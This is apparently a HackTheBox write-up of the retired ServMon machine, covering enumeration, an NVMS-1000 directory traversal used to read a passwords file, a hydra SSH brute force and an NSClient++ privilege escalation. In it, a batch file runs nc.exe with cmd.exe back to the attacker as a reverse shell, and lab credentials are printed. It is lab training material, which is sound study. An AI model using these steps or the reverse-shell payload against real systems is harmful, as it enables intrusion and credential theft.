Writeups of HackTheBox retired machines

Project maintained by flast101 Hosted on GitHub Pages — Theme by mattgraham

<– Back


1- Overview

Retire: 20 June 2020
Writeup: 20 June 2020


2- Enumeration
2.1- nmap scan
2.2- FTP Browsing
2.3- NVMS-1000

3- Exploitation

4- Privilege Escalation
4.1- Post-Compromise Enumeration
4.2- Post-Compromise Exploitation Part 1 - Web Server Connection
4.3- Post-Compromise Exploitation Part 2 - Script Execution]
4.4- Root.txt

2- Enumeration

2.1- nmap scan

First things first, we begin with a nmap scan:

root@kali:~# nmap --reason -Pn -sV -sC --version-all

Nmap scan report for
Host is up, received user-set (0.059s latency).
Scanned at 2020-05-03 18:30:17 CEST for 366s
Not shown: 991 closed ports
Reason: 991 resets

21/tcp   open     ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT

22/tcp   open     ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnC92+BCplDo38VDQIZzb7V3HN/OucvxF0VMDDoYShdUrpDUW6JcSR/Zr6cADbHy7eDLw2O+WW+M4SzH7kfpbTv3HvJ0z8iOsRs2nUrUint4CR/A2vYA9SFOk18FU0QUS0sByBIlemU0uiPxN+iRCcpFhZDj+eiVRF7o/XxNbExnhU/2n9MXwFS8XTYNeGqSLE1vV6KdpMfpJj/yey8gvEpDQTX5OQK+kkUHze3LXLyu/XVTKzfqUBMAP+IQ5F6ICWgaC1a+cx/D7C/aobCbqaXY+75t1mxbEMmm1Wv/42nVQxcT7tN2C3sds4VJkYgZKcBhsE0XdJcR9mTb1wWsg9
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|   256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)

80/tcp   open     http          syn-ack ttl 127
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
|     <html xmlns="">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).

135/tcp  open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open     netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds? syn-ack ttl 127

5666/tcp open     tcpwrapped    syn-ack ttl 127
6699/tcp open     tcpwrapped    syn-ack ttl 127
7001/tcp filtered afs3-callback no-response

Host script results:
|_clock-skew: -1s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 8714/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 11673/udp): CLEAN (Timeout)
|   Check 4 (port 62863/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-03T16:36:16
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Sun May  3 18:36:23 2020 -- 1 IP address (1 host up) scanned in 366.44 seconds

First, what do we have here ?

2.2- FTP Browsing

As we know we can login to the FTP, let’s try it and login using credentials anonymous:anonymous:

root@kali:~# ftp

Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> dir Nadine
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> dir Nathan
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.

We download these 2 files and examine their content :



Of course, we don’t have Nathan’s creds at the moment, but we can search for NVMS.

2.3- NVMS-1000

Googling information about NVMS, we find on the product page that NVMS-1000 is a monitoring client which is specially designed for network video surveillance.
In the “Features” section, we can read the following: “Brand new user interface: Main panel as the unified entry, clearly classifies the main functions. Each function adopts dynamic Tab label for easy operation. Preview window has embedded toolbar and right-clicking menu; adopts accordion tree view control.

We understand that there might be a web server and an interface installed on the machine. We easily find it by typing the url, which is redirected here:


3- Exploitation

When we googled NVMS, we also noticed a link to EDB: NVMS 1000 - Directory Traversal -

Using it is as simple as putting the request in Burp Repeater and clicking “send”. Testing it with C:\windows\win.ini is nice, but we are interested in the passwords file we read about. Let’s try if we can read this file using the exploit :


Beautiful !

Now, we just have to put our users Nadine and Nathan in a file “users.txt”, the passwords in another file “passwords.txt”, and run hydra to test which creds are valid for a ssh login:


I love it when a plan comes together.

The creds we were looking for are nadine:L1k3B1gBut7s@W0rk


4- Privilege Escalation

4.1- Post-Compromise Enumeration

Before using a privesc reporting tool like WinPEAS, I usually check around if there is nothing obvious.
I first look at the account permissions with “whoami /all” command, but nothing particular here. Nadine has a low-privileged account.
Then I look at directories, and this time we can notice an unusual one: “C:\Program Files\NSClient++”. This one corresponds to what we previously read in Nathan’s text file mentioning this application.

Google is our very best friend (when they don’t spy to much on their users in “private mode” :joy: but whatever…).
We find a link to its website “NSClient++ is an agent designed originally to work with Nagios but has since evolved into a fully fledged monitoring agent which can be used with numerous monitoring tools (like Icinga, Naemon, OP5, NetEye Opsview etc).
There is also a link to its documentation:

Exploit-DB is our second best friend.
Here is what we find: NSClient++ - Privilege Escalation -

4.2- Post-Compromise Exploitation Part 1 - Web Server Connection

Reading the exploit, there is a 7 steps process which requires an attacker to have local access to a system running NSClient++ with Web Server.

At the first step, it is written that we may grab the administrator password in the file C:\Program Files\NSClient++\nsclient.ini. Let’s have a look to this file :eyes: :

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini

´╗┐# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts =


OK. We have a password, and the “allowed hosts” parameter confirms that we should have a local access to the machine. So, how and where can we log into ?

As we have a local low-privileged SSH access, we may try using this compromised windows machine to set up a port forwarding.

With SSH, we access the windows machine on its port 22 and we want to get to the NSClient application port. But which port is it ?
We look for port number on the documentation site and we get the information we need on


Now, we know the port is 8443. We can use the following command to connect to the web application page:

root@kali:~# ssh -N -L nadine@

Let me explain:
We execute an ssh command from our attack machine. We will not technically issue any ssh commands (-N) but will set up port forwarding (with -L), bind port 8443 on our local machine ( to port 8443 on the target ( and do this through a session to our original target, logging in as nadine.

Once we understand this, we may want an easy way to use this command, like a “fire and forget” mode where you don’t have to enter the password. Let’s give a try to this one-liner:

root@kali:~# expect -c 'spawn ssh -N -L nadine@; expect "password:"; send "L1k3B1gBut7s@W0rk\r"; interact'

4.3- Post-Compromise Exploitation Part 2 - Script Execution

Now we can connect the application:


We should keep an eye on the Exploit-DB page and follow instructions:

2. Login and enable following modules including enable at startup and save configuration:
-> CheckExternalScripts
-> Scheduler

These modules are already enabled:


Now, the plan is to upload a script to get a reverse shell and make the NSClient application run it as Administrator. “3. Download nc.exe and evil.bat to c:\temp from attacking machine

We make a file including the code :

@echo off       
c:\temp\nc.exe 443 -e cmd.exe

And we set up a web server or a FTP server on our attacking machine to be able to transfer the files “nc.exe” and “evil.bat” on the target. If we choose to set up a FTP server:

root@kali:~# systemctl start pure-ftpd

From the target, we connect to the ftp and download the files:

nadine@SERVMON c:\Temp>ftp
Connected to
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 18:33. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
504 Unknown command
User ( fred
331 User fred OK. Password required
230 OK. Current directory is /
ftp> get evil.bat
200 PORT command successful
150 Connecting to port 51951
226-File successfully transferred
226 0.000 seconds (measured here), 417.48 Kbytes per second
ftp: 53 bytes received in 0.00Seconds 53000.00Kbytes/sec.
ftp> get nc.exe
200 PORT command successful
150-Connecting to port 51962
150 58.0 kbytes to download
226-File successfully transferred
226 0.068 seconds (measured here), 0.83 Mbytes per second
ftp: 59584 bytes received in 0.10Seconds 572.92Kbytes/sec.
ftp> quit

221-Goodbye. You uploaded 0 and downloaded 59 kbytes.
221 Logout.

nadine@SERVMON c:\Temp>dir  
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of c:\Temp

27/05/2020  17:34    <DIR>          .
27/05/2020  17:34    <DIR>          ..
27/05/2020  17:34                53 evil.bat
27/05/2020  17:34            59,584 nc.exe
               2 File(s)         59,637 bytes
               2 Dir(s)  27,869,081,600 bytes free

Next step of the process:
4. Setup listener on attacking machine

root@kali:~# nc -nlvp 443
Ncat: Version 7.80 ( )
Ncat: Listening on :::443
Ncat: Listening on

Then (we are almost done):
5. Add script foobar to call evil.bat and save settings

We go in the “Settings” menu and click “Add new” to add our script “evil.bat”:


Step 6 proposes to schedule the script, but clicking the “Control” button in the upper-right corner allows to restart NSClient and then we just have to run our script from the “Queries” tab using the “myshell” button (the one we previously set when adding our script):


4.4- Root.txt

We have our shell !!


And we can grab the root.txt file:


Be Curious, Learning is Life !

<– Back